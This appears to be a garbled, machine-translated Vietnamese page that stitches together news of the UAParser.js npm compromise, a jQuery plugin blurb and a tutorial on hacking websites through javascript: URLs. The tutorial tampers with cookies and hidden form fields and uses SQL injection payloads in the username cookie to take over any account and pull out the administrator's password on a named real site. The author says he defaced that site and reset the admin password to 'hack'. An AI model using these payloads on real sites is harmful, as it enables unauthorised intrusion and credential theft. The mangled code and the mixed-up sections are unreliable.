Javascript cho tin tặc

UAParser. js, một thư viện JavaScript phổ biến trên NPM với hơn 6 triệu lượt tải xuống hàng tuần đã bị tấn công và thêm phần mềm độc hại, Đánh cắp tiền điện tử và mật khẩu của người dùng

Hacker chiếm quyền một tài khoản của nhà phát triển trên NPM

Cuộc tấn công liên tiếp từ các hacker vào thư viện mã nguồn mở JavaScript NPM ở ba phiên bản là 0. 7. 29, 0. 8. 0, 1. 0. 0 sau khi hacker chiếm đoạt thành công tài khoản NPM của nhà phát triển NPM. Sau đó chèn phần mềm độc hại cùng với mã độc trong thư viện UAParser. js to the medium year

"Tôi tin rằng ai đó đã chiếm đoạt tài khoản NPM của tôi và xuất bản một số phần mềm độc hại [0. 7. 29, 0. 8. 0, 1. 0. 0]", nhà phát triển Faisal Salman của UAParser. js for know.  

Công ty DevSecOps Sonatype còn tiết lộ chi tiết rằng ba gói phần mềm có tên okhsa, klow và klown đang giả mạo là tiện ích phân tích chuỗi tác động người dùng với mục tiêu khai thác tiền điện tử và đánh cắp các dữ liệu quan trọng

Github còn cho biết thêm. "Bất kỳ hệ thống máy tính nào đã cài đặt các gói phần mềm này nên gỡ bỏ ngay lập tức. Ngoài ra, tất cả các tệp tài liệu lưu trữ trên máy tính phải được chuyển sang máy tính khác"

Jquery có thể không còn xa lạ với các bạn web developer, nó là một thư viện javascript giúp tạo nhiều hiệu ứng trên website nhanh chóng với cú pháp code đơn giản hơn. Jquery được sử dụng rộng rãi và ngày càng mạnh mẽ nhờ nhiều plugin mở rộng. Cũng theo phong trào ấy, chúng ta sẽ cùng nhau tạo và xuất bản một plugin đơn giản nhất

Trong bài viết này mình sẽ giới thiệu với các bạn về kỹ thuật hack web chỉ sử dụng JavaScript. Với kỹ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp trên trang web. Tất cả chỉ với trình duyệt web hỗ trợ “gỡ lỗi javascript-inline”, chẳng hạn như Internet Explorer, Netscape hay Mozilla,… Cơ bản về JavaScript-Inline

Webố số trình duyệt web đều hỗ trợ JavaScript-Inline. You can thi hành JavaScript bằng cách nhập vào thanh URL như sau

jav. void[< set command JavaScritpt ngay tại đây. >]

Ví dụ

Để xem giá trị hiện tại của cookie, bạn nhập javascript. cảnh báo [tài liệu. bánh quy]

Hoặc để thay đổi giá trị của trường ẩn “hiddenid” của biểu mẫu đầu tiên thành “2”, bạn nhập javascript. vô hiệu [tài liệu. biểu mẫu[0]. ẩn danh. giá trị =”2″]

Một số đối tượng thông tin được áp dụng khi thao tác với JavaScript-Inline là

tài liệu. cookie – chứa giá trị của cookie

tài liệu. biểu mẫu[0]. Tên trường. value – lấy giá trị của trường trong biểu mẫu

tài liệu. biểu mẫu[0]. Chọn Tên. tùy chọn[0]. value – value of field selection in form

[ Xem hướng dẫn về JavaScript tại trang web này ]

Một vài ví dụ về hack web bằng JavaScript-Inline

http. //khoa học viễn tưởng. trang. tại/hackits/stufe4code. htm

Mã nguồn HTML có đoạn như sau.

HTMLvar a=unescape[“%43%4f%44%45%5a”];

Kiểm tra chức năng[]

{

nếu [tài liệu. a. c. giá trị == a]

{

tài liệu. địa điểm. href=”http. //khoa học viễn tưởng. trang. tại/hackits/”+tài liệu. a. c. giá trị +”. htm”;

}

khác

{

cảnh báo [“sai. - kích cỡ chữ?"];

}

}

}

Đơn giản bạn có thể nhập thẳng vào thanh URL của IE như sau. jav. alert[unescape[a]] to get password of level next [“CODEZ”]

http. //www. hackthissite. tổ chức/nhiệm vụ/nhiệm vụ8/

Nhiệm vụ thực tế 8 trên hackthissite. org yêu cầu bạn chuyển 10 triệu đô la từ tài khoản của “Gary Hunter” vào tài khoản “dropCash”. Sau khi bạn sử dụng SQL-Injection để lấy tên người dùng của “Gary Hunter”, bạn tiến hành chuyển tiền như sau

Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn nhập vào

CODEjavascript:void[document.write[‘’]]

Đoạn JavaScript trên sẽ tạo một biểu mẫu với trường ẩn FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000

Bây giờ bạn đã thay đổi lại cookie như sau

MÃjavascript. vô hiệu [tài liệu. cookie=”accountUsername=G aryWilliamHunter”]

jav. vô hiệu [tài liệu. cookie=”accountPassword=G aryWilliamHunter”]

Ấn nút “Chuyển tiền sang tài khoản khác” một cái là xong

Mình nghĩ rất có khả năng là nhiệm vụ 8 tạo phiên[“LoggedIn”]. Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session[“LoggedIn”]=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong phiên của chúng ta vì nó chỉ kiểm tra phiên[“LoggedIn”]=1 mà không kiểm tra tên người dùng thực sự là ai

Ví dụ cuối cùng, mình sẽ trình bày cách hack trang web http. //www. mangvieclam. com/ . Mình đã gửi lời nhắn cho admin của mangvieclam. com nhưng không thấy liên lạc với mình để sửa lỗi. Hihi, cái “tin nhắn” của mình ở cuối trang index. asp trên mangvieclam. com chưa thấy ai xóa hết.

Sau khi đã đăng nhập vào mangvieclam. com, you typing into thanh URL line javascript. cảnh báo [tài liệu. cookie] để xem cookie

Ban co the thay đổi thông tin cá nhân của một người dùng bất kỳ trên mangvieclam. com bằng cách đổi lại tên người dùng cookie như sau. jav. vô hiệu [tài liệu. cookie=”username=tên người dùng”], sau đó chọn mục “Cập nhập thông tin”

Bạn cũng có thể thay đổi mật khẩu của một người dùng bất kỳ trên mangvieclam. com sau khi đã đăng nhập vào tài khoản của mình như sau. chọn mục “Thay đổi mật khẩu”, nhập dòng javascript. vô hiệu [tài liệu. cookie=”username=tên người dùng”+escape[“‘ or ‘1’=’1”]] vào thanh URL, nhập mật khẩu cũ cũng được và mật khẩu mới, sau đó nhấn nút “Thay đổi mật khẩu”

This error is in file icl/filerec/detail. asp, line thứ 43. 65. Ví dụ, khi bạn đặt tên người dùng cookie là “trungkien’ hoặc ‘1’=’1”, các câu lệnh SQL sau sẽ được thực thi

Select Count[UserID] As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1′ And Passwords='md5[password old sai]' And Active = 1982 // luôn trả về true do điều kiện hoặc '1

Update tblUserInfo Set Passwords = 'md5[password new]' Where UserID = 'trungkien' or '1'='1′ And Active = 1982 // luôn set password mới cho user “trungkien” do điều kiện UserID = 'trungkien' đúng

Rất tiếc là lỗi này không thể khai thác trên http. //www. mangvieclam. com/ do error setting.

Chọn Count[UserID] As Check From tblUserInfo Where UserID = N’trungkien’ hoặc ‘1’=’1′ And Passwords = N’…’ And Active = 1982

Tuy nhiên, trang web http. //www. mangvieclam. com/ sử dụng CSDL MS-SQL nên mình dễ dàng lấy tên người dùng và mật khẩu của quản trị viên từ tblConfig như sau.

Đầu tiên mình lấy tên người dùng bằng javascript. vô hiệu [tài liệu. cookie=”username=”+escape [“‘ or 1=convert[int,[select adminid from tblconfig where accid=1]]–“]]

Chọn mục “Cập nhập thông tin”

Tên đăng nhập của quản trị viên là ‘ngtuan’

Tương tự mình lấy mật khẩu của quản trị viên bằng javascript. vô hiệu [tài liệu. cookie=”username=”+escape [“‘ or 1=convert[int,[select adminpass from tblconfig where accid=1]]–“]]

Bây giờ mình đặt lại mật khẩu mới là ‘hack’

Chủ Đề